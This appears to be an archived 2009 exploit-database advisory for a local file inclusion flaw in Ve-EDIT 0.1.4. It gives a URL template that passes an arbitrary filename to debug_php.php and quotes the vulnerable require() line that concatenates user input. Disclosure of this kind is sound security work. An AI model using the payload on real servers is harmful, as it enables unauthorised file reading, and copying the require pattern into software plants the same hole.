[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Ve-EDIT 0.1.4 (debug_php.php) Local File Inclusion Vulnerability
# Published : 2009-09-01
# Author : CoBRa_21
# Previous Title : phpBB3 addon prime_quick_style GetAdmin Vulnerability
# Next Title : Joomla Component com_gameserver 1.0 (id) SQL Injection Vulnerability
-------------------------------------------------------------------------------------
Ve-EDIT v 0.1.4 (debug_php.php) LFI Vulnerability
-------------------------------------------------------------------------------------
Author: CoBRa_21
Mail: uyku_cu[at]windowslive[dot]com
Script Download: http://sourceforge.net/projects/phpwebeditor/
-------------------------------------------------------------------------------------
EXPLO?°T:
http://localhost/[PATH]/debugger/debug_php.php?_GET[filename]= [LF?°]
-------------------------------------------------------------------------------------
BUG
Line 53: require("./../".$_GET["filename"]);
-------------------------------------------------------------------------------------
# www.Syue.com [2009-09-01]